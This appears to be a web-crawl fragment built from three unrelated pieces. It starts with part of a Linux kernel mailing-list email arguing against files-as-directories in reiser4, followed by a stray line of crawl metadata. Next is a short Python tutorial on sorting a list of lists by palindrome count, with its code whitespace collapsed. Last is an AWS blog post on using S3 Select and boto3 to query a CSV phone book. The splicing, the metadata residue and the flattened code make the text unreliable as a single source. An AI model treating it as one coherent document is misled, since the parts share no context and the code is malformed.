deadlock or an oops when doing a hard link out of one).> > Some other things reiser4 can do would be better if they were in> the VFS since other filesystems might want to support the same> functionality. > > Or Linux may not support some of the things reiserfs at all.> > 5. What belongs in the kernel, what belongs in userspace?> > This is mostly what I have been trying to argue about.> > So, to try to summarize my opinion, regarding file-as-directory, I> belive it's fatally flawed because it breaks a lot of assumptions that> existing code make. One example of an application that will break is> a web server that tries to filter out accesses to "bad" files,> files-as-directories suddenly means that part of those files will be> accessible (and there are a _lot_ of CERT reports on just this kind of> problems with Windows web servers due to access to named streams not> being restricted or ways to access files with non-canonical names that> also managed to bypass access restrictions).> > Files-as-directories also does not give us named streams on> directories. The suggestion to have dir/metas access the named> streams means that if someone already has a file named metas in a> directory that file will be lost. (Does anyone remember the> discussions about the linux kernel having a directory named "core" and> the problems this caused for some people?)> > All this suggests to me that named streams must live in another> namespace than the normal one. To me, openat(3) seems like a good> choice for an API and it has the advantage that someone else, Solaris,> already has implemented it.> >.> > Regarding the kernel or userspace discussion. In my opinion anything> that can be done in user space should be done in userspace. If the> performance sucks, or it has security problems, or needs caching that> cant be solved in userspace it can be moved to the kernel, but in that> case the smallest and cleanest API possible should be implemented.> > If, for historical reasons, an API must be in the kernel, there is not> much we can do about it either. It'll have to stay there, but we can> avoid making the same mistakes again.> > So, for all the examples of the kernel having plugins that> automatically lets an application see a tar-file as a directory, I> really, really don't belive this belongs in the kernel. First of all,> this is the file-as-directory discussion again, I belive it is a> mistake to expose the contents as a directory on top of the file> because it breaks a lot of assumptions that unix programs make.> > It's much better to expose the contents at another place in the> filesystem by doing a temporary mount of the file with the proper> filesystem. As Pavel Machek pointed out, this has the problem of who> cleans up the mount if the application crashes. One way to handle> this could be something like this:> > mount -t tarfs -o loop bar.tar /tmp/bar-fabb50509> chdir /tmp/bar-fabb50509> umount -f /tmp/bar-fabb50509> > This will require the ability to unmount busy filesystems (but I> belive Alexander Viro already has implemented the infrastructure> needed for this).> > Or for files that we don't have a real filesystem driver (or on other> systems where userspace mounts are not allowed), we could just unpack> the contents into /tmp. For cleanup we could let whatever cleans up> /tmp anyways handle it, or have a cache daemon that keeps track of> untarred directories and removes them after a while.> > Another way is to completely forget about presenting the contents of a> tar file as a real files, and just use a shared library to get at the> contents (now we just have to convince everyone to use the shared> library). This would also be portable to other systems.> > If we do this right, it could all be hidden in a shared library, and> if the system below it supports more advanced features, it can use it.> > Regarding the "I want a realtime index of all files". I belive that a> notifier that can tell me when a file has been changed and a userspace> daemon ought to handle most of the cases that have been mentioned.> The suggested problems of not getting an up to date query response can> be handled by just asking the daemon "are you done with indexing yet".> The design of such a daemon and the support it needs from the kernel> can definitely be discussed. But to put the indexer itself in the> kernel sounds like a bad idea. Even adding an API to query the> indexer into the kernel sounds pointless, why do that instead of just> opening a Unix socket to the indexer and asking it directly?> > /Christer> > -- > "Just how much can I get away with and still go to heaven?"> > Freelance consultant specializing in device driver programming for Linux > Christer Weinigel <christer@weinigel | https://lkml.org/lkml/2004/9/7/81 | CC-MAIN-2017-51 | refinedweb | 1,252 | 68.81 |
When it is required to sort matrix based on palindrome count, a method is defined that takes a list as parameter. It uses the list comprehension and ‘join’ method to iterate and see if an element is a palindrome or not. Based on this, results are determined and displayed.
Below is a demonstration of the same
def get_palindrome_count(row): return len([element for element in row if''.join(list(reversed(element))) == element]) my_list = [["abcba", "hdgfue", "abc"], ["peep"],["py", "is", "best"],["sees", "level", "non", "noon"]] print("The list is :") print(my_list) my_list.sort(key=get_palindrome_count) print("The resultant list is :") print(my_list)
The list is : [['abcba', 'hdgfue', 'abc'], ['peep'], ['py', 'is', 'best'], ['sees', 'level', 'non', 'noon']] The resultant list is : [['py', 'is', 'best'], ['abcba', 'hdgfue', 'abc'], ['peep'], ['sees', 'level', 'non', 'noon']]
A method named ‘get_palindrome_count’ is defined that takes a list as parameter.
List comprehension is used to iterate over the list and see if the element is a palindrome or not.
If yes, it is returned.
Outside the method, a list of list with string values is defined and is displayed on the console.
The ‘sort’ method is used to sort the list based on the key being the previously defined method.
This is displayed as the output on te console. | https://www.tutorialspoint.com/python-sort-matrix-by-palindrome-count | CC-MAIN-2021-49 | refinedweb | 211 | 70.33 |
Create a C# program which asks the user for two numbers and answers, using the conditional operator (?), the following:
6
4
A is positive
B is positive
Both are positive
using System;
public class ConditionalOperator
{
public static void Main(string[] args)
{
int a = Convert.ToInt32(Console.ReadLine());
int b = Convert.ToInt32(Console.ReadLine());
Console.WriteLine(a > 0 ? "A is positive" : "A is not positive");
Console.WriteLine(b > 0 ? "B is positive" : "B is not positive");
Console.WriteLine((a > 0) && (b > 0) ? "Both are positive" : "Not both are positive");
}
}
Practice C# anywhere with the free app for Android devices.
Learn C# at your own pace, the exercises are ordered by difficulty.
Own and third party cookies to improve our services. If you go on surfing, we will consider you accepting its use. | https://www.exercisescsharp.com/flow-controls-c/conditional-operator/ | CC-MAIN-2022-05 | refinedweb | 131 | 51.04 |
So I have been using react for about 10 months now after switching from a framework I thought I will never leave, you guessed it 🤗 Angular. Angular code was clean and readable and I loved it because it was strongly typed by default (😊 of course that's the beauty of TypeScript).
When my colleague introduced me to React, I said to my self how can this guy introduce me to such a mess, writing jsx was a bit weird to me at first but trust me once you start writing jsx you will never go back.
I started looking for design patterns to make my react code clean and reusable. During this journey, I came across compound components and I started using them with a CSS-in-JS library (styled-components), and I have to say this😎 I was in love😍. My code looked clean and it was also easy to debug.
If you have used a native HTML
<select> and
<option> you can easily understand the concept behind compound components.
<select> <option value="value1">key1</option> <option value="value2">key2</option> <option value="value3">key3</option> </select>
If you try to use one without the other it would not work, and also it doesn't make sense.
Now, let's get a look at our React
<Table /> component that exposes a compound component to understand these principles further. Here is how it looks like.
<Table> <Table.Head> <Table.TR> <Table.TH>Heading 1</Table.TH> <Table.TH>Heading 2</Table.TH> </Table.TR> </Table.Head> <Table.Body> <Table.TR> <Table.TH>data 1</Table.TH> <Table.TH>data 2</Table.TH> </Table.TR> <Table.TR> <Table.TH>data 3</Table.TH> <Table.TH>data 4</Table.TH> </Table.TR> </Table.Body> </Table>
But before we get to that, this is how I structure my components. Let me know if you have a better way of structuring components I would love to try it out.
📦components ┣ 📂table ┣ 📂styles ┃ ┗ 📜table.js ┗ 📜index.js
All my styles will be in the styles directory and index.js file imports the styled components from the styles directory. Below is how I will style my table. We are ignoring css however just to keep the post short.
import styled from 'styled-components'; export const StyledTable = styled.table` // custom css goes here `; export const THead = styled.thead` // custom css goes here `; export const TFoot = styled.tfoot` // custom css goes here `; export const TBody = styled.tbody` // custom css goes here `; export const TR = styled.tr` // custom css goes here `; export const TH = styled.th` // custom css goes here `; export const TD = styled.td` // custom css goes here `;
Now in the index.js that's where all the action is. Remember with our table component we are exporting just the table component and the other components we accessing them from the table component using the dot notation.
import { StyledTable, THead, TBody, TFoot, TH, TR, TD } from './styles/table'; export const Table = ({ children, ...rest }) => { return <StyledTable {...rest}>{children}</StyledTable>; }; Table.Head = ({ children, ...rest }) => { return <THead {...rest}>{children}</THead>; }; Table.Body = ({ children, ...rest }) => { return <TBody {...rest}>{children}</TBody>; }; Table.Foot = ({ children, ...rest }) => { return <TFoot {...rest}>{children}</TFoot>; }; Table.TH = ({ children, ...rest }) => { return <TH {...rest}>{children}</TH>; }; Table.TR = ({ children, ...rest }) => { return <TR {...rest}>{children}</TR>; }; Table.TD = ({ children, ...rest }) => { return <TD {...rest}>{children}</TD>; };
I know I have to explain some things here like how we are accessing these other components when we are not directly exporting them and how the children prop works.
The only component that we are exporting here is the
<Table/> component which wraps the
<StyledTable/> component. We then use the dot notation to attach other components to the
<Table/> component. If we were using class components we will use the static keyword to do the same thing. We can now for example access the styled table row like so
<Table.TR/>
Anything passed between the opening and closing tags of a component can be accessed using the
children prop in react, for example, if we write this code
<Table.TR>data</Table.TR>, props.children will be equal to 'data'. That's basically how the children prop works.
We want the end-users of our components to be able to customize them so we are taking everything they are passing as props and spread it on the styled component using the object destructuring syntax
{..rest}.
I hope this post helped you understand compound components. Feel free to comment on areas you need clarity I will respond, or areas you think I need to improve. In the future, we will create a dropdown component using this pattern but now there will be state and we will be using custom hooks and the Context API to manage the state of the dropdown.
Discussion (2)
Cool. Thank you. New to the React world. Might take you up on that. Great article.
Glad it helped, I am thinking of sharing my folder structure before I get into some of these concepts. Its one of the areas I struggled with when I got started with react. | https://dev.to/josemukorivo/create-a-reusable-table-with-react-styled-components-and-compound-components-design-pattern-40cn | CC-MAIN-2021-21 | refinedweb | 846 | 65.52 |
AWS Storage Blog difficulty entailed in efficiently searching through large amounts of data for what you need.
In this post, we cover using structured query language (SQL) queries to search through data loaded to Amazon Simple Storage Service (Amazon S3) as a comma-separated value (CSV) file. Previously, the data would need to be loaded into a database to be queried. In addition to deploying a database, the customer would have needed to deploy an application and website to enable the search. Instead of deploying a database and associated resources, we instead leverage an S3 feature called S3 Select to create a phone book search tool that is completely serverless.
We first show the basics of executing SQL queries to return results from a simple phone book .csv file. To explore this solution a bit further, we create a sample phone book search tool on the AWS Examples GitHub page that includes all the necessary components to create a completely serverless phone book search application.
Customers leverage Amazon S3 to store and protect any amount of data without provisioning storage or managing infrastructure. Amazon S3 Select and Amazon S3 Glacier Select enable customers to run structured query language SQL queries directly on data stored in S3 and Amazon S3 Glacier. With S3 Select, you simply store your data on S3 and query using SQL statements to filter the contents of S3 objects, retrieving only the data that you need. By retrieving only a subset of the data, customers reduce the amount of data that Amazon S3 transfers, which reduces the cost and latency of retrieving this data. Reducing cost and complexity enables AWS customers to move faster and reduce the amount of time required to deliver value to their businesses and their customers.
S3 Select works on objects stored in CSV, JSON, or Apache Parquet format. S3 Select also supports compression on CSV and JSON objects with GZIP or BZIP2, and server-side encrypted objects. You can perform SQL queries using AWS SDKs, the SELECT Object Content REST API, the AWS Command Line Interface (AWS CLI), or the AWS Management Console.
Featured AWS services
Our simple phone book application leverages the following AWS services:
- Amazon S3 is an object storage service that offers industry-leading scalability, data availability, security, and performance.
- S3 Select enables applications to retrieve only a subset of data from an S3 object by using simple SQL expressions.
In addition to S3 and S3 Select, the Amazon S3 Select – Phonebook Search GitHub sample project includes the following services:
- Amazon API Gateway is a fully managed service that makes it easy for developers to create, publish, maintain, monitor, and secure APIs at any scale. Amazon API Gateway is a common component of serverless applications and will be used to interact with AWS Lambda.
- AWS Lambda lets you run code without provisioning or managing servers. The S3 Select query in our sample project will be executed with AWS Lambda.
- AWS CloudFormation provides a common language for you to model and provision AWS and third-party application resources in your cloud environment. CloudFormation is used for our sample app to orchestrate the deployment of the resources required for the sample project with minimal effort.
Sample Code
Sample code for this project exists in the AWS-Samples GitHub repository and the high-level details are outlined below.
Getting started
Since S3 Select runs directly on S3 with data stored in your S3 bucket, all you need to get started is an AWS account and an S3 bucket.
Sign in to your existing AWS account, or create a new AWS account. Once you sign in, create a S3 bucket to be used for testing with S3 Select.
The data we use for testing is a simple CSV file containing the Name, Phone Number, City, and Occupation of our users. The raw data of the CSV file is below, and available in GitHub, so feel free to download the file and edit it as well!
Name,PhoneNumber,City,Occupation Sam,(949) 555-6701,Irvine,Solutions Architect Vinod,(949) 555-6702,Los Angeles,Solutions Architect Jeff,(949) 555-6703,Seattle,AWS Evangelist Jane,(949) 555-6704,Chicago,Developer Sean,(949) 555-6705,Chicago,Developer Mary,(949) 555-6706,Chicago,Developer Kate,(949) 555-6707,Chicago,Developer
Upload the sample_data.csv file to your new S3 bucket.
To quickly test, we run the following in Python, which queries the “sample_data.csv” object in our S3 bucket named “s3select-demo.” Please note the bucket name must be changed to reflect the name of the bucket you created.
To get setup for this quick test, we deploy a t3.micro running EC2 instance Amazon Linux 2 and install boto3 using the pip command. Be sure to use the IAM role with appropriate permissions.
Configuring an EC2 instance to run S3 Select queries
Once the instance is running, log in as an ec2-user and run the following commands to setup your environment:
sudo yum update -y sudo yum install python3 -y python3 -m venv ~/s3select_example/env source ~/s3select_example/env/bin/activate pip install pip --upgrade pip install boto3 wget wget
The steps above create a python3 environment and downloads a Python file called called jane.py with the following contents. This file allows us to search users with the first name of Jane. Note you must replace the current S3 bucket name to match your S3 bucket.
import boto3 s3 = boto3.client('s3') resp = s3.select_object_content( Bucket='s3select-demo', Key='sample_data.csv', ExpressionType='SQL', Expression="SELECT * FROM s3object s where s.\"Name\" = 'Jane'", InputSerialization = {'CSV': {"FileHeaderInfo": "Use"}, 'CompressionType': 'NONE'}, OutputSerialization field is set to CSV, so this prints the results matching “Jane” as CSV. This could be set to JSON if preferred for your use case.
Executing a S3 Select query
After changing the S3 bucket name in the jane.py file to match the S3 bucket name you created, run the query using the following command:
python jane.py
This results in the output below:
Jane,(949) 555-6704,Chicago,Developer Stats details bytesScanned: 326 Stats details bytesProcessed: 326 Stats details BytesReturned: 38
The match for the user Jane shows up, along with some optional details we added to show the data scanned, processed, and returned by S3 Select. In this case, the sample_data.csv is 326 bytes. S3 Select scans the entire file and returns only 38 bytes.
S3 Select with compressed data
Let’s run the same test again but this time after compressing and uploading a GZIP version of the phonebook saved as sample_data.csv.gz. This file is also available for download from GitHub.
The modifications in your Python code are to change the Key to the gzip’d object and to change the InputSerialization CompressionType from None to GZIP. The new version of the Python script is saved as jane-gzip.py and is available on the AWS-Samples GitHub page as well.
We changed the object key name to specify the gzip file:
Key='sample_data.csv.gz',
And we changed the InputSerialization line to change the CompressionType to GZIP:
InputSerialization = {'CSV': {"FileHeaderInfo": "Use"}, 'CompressionType': 'GZIP'},
The full file of jane-gzip.py is below. Note you must replace the current S3 bucket name to match the name of your S3 bucket.
import boto3 s3 = boto3.client('s3') resp = s3.select_object_content( Bucket='s3select-demo', Key='sample_data.csv.gz', ExpressionType='SQL', Expression="SELECT * FROM s3object s where s.\"Name\" = 'Jane'", InputSerialization = {'CSV': {"FileHeaderInfo": "Use"}, 'CompressionType': 'GZIP'}, following command executes an S3 Select query on the gzip file:
python jane-gzip.py
This results in the output below:
Jane,(949) 555-6704,Chicago,Developer Stats details bytesScanned: 199 Stats details bytesProcessed: 326 Stats details bytesReturned: 38
Comparing results of compressed and uncompressed data
Using gzip compressing saves space on S3 and reduces the amount of data process. In the case of our small csv file for this test, using compression results in a 39% space savings.
The following table shows the difference executing S3 Select between the two files, sample_data.csv and sample_data.csv.gz.
Taking advantage of data compression gets more interesting with larger files, like a 133,975,755-byte CSV file (~128 MB) consisting of ~1,000,000 lines. In testing such a file, the file size was reduced by ~60% down to 50,308,104 bytes (~50.3 MBytes) with GZIP compression.
Querying Archives with S3 Glacier Select
When you provide an SQL query for a S3 Glacier archive object, S3 Glacier Select runs the query in place and writes the output results to Amazon S3. With S3 Glacier Select, you can run queries and custom analytics on data stored in S3 Glacier without having to restore your data to a hotter tier like S3 Standard.
When you perform select queries, S3 Glacier provides three data access tiers—expedited, standard, and bulk. All of these tiers provide different data access times and costs, and you can choose any one of them depending on how quickly you want your data to be available. For all but the largest archives (250 MB+), data that is accessed using the expedited tier is typically made available within 1–5 minutes. The standard tier finishes within 3–5 hours. The bulk retrievals finish within 5–12 hours.
Conclusion
In this post, we showed how S3 Select provides a simple way to execute SQL queries directly on data stored in Amazon S3 or Amazon S3 Glacier. S3 Select can run against data stored in S3, enabling customers to use this feature to process data uploaded to S3, either programmatically or from services such as AWS Transfer for SFTP (AWS SFTP). For example, customers could upload data directly to S3 using AWS SFTP and then query the data using S3 Select. This work can be automatically triggered by an AWS Lambda execution after a new CSV object is uploaded to S3 with S3 Event Notifications. Searching through your data using S3 Select can potentially save you time and money spent on combing through data other ways.
To get more hands-on with S3 Select, we encourage you to head over to the AWS Samples GitHub repo. There you can find sample code for the simple phonebook application, so you can get more hands-on time with S3 Select. The GitHub repo offloads the command to AWS Lambda, which is initiated by Amazon API Gateway.
Cleaning up
In our sample, we created a S3 bucket, uploaded a .csv file (sample_data.csv), and queried the data using a t3.micro EC2 instance. To clean up the environment, shutdown and terminate the EC2 instance and delete the sample_data.csv file from your S3 bucket. You can also choose to delete the S3 bucket you used for testing. These steps ensure that there are no forthcoming costs to your account stemming from this sample.
Additional Resources
- GitHub repo that includes a .csv phonebook file and the necessary code required to deploy this sample application
- AWS Samples GitHub includes sample code for multiple AWS services and example use cases
- Amazon S3 Select documentation
- SQL reference for Amazon S3 Select.
- AWS Transfer for SFTP
- Using AWS Lambda with Amazon S3 Events | https://aws.amazon.com/blogs/storage/querying-data-without-servers-or-databases-using-amazon-s3-select/ | CC-MAIN-2021-21 | refinedweb | 1,859 | 53.71 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.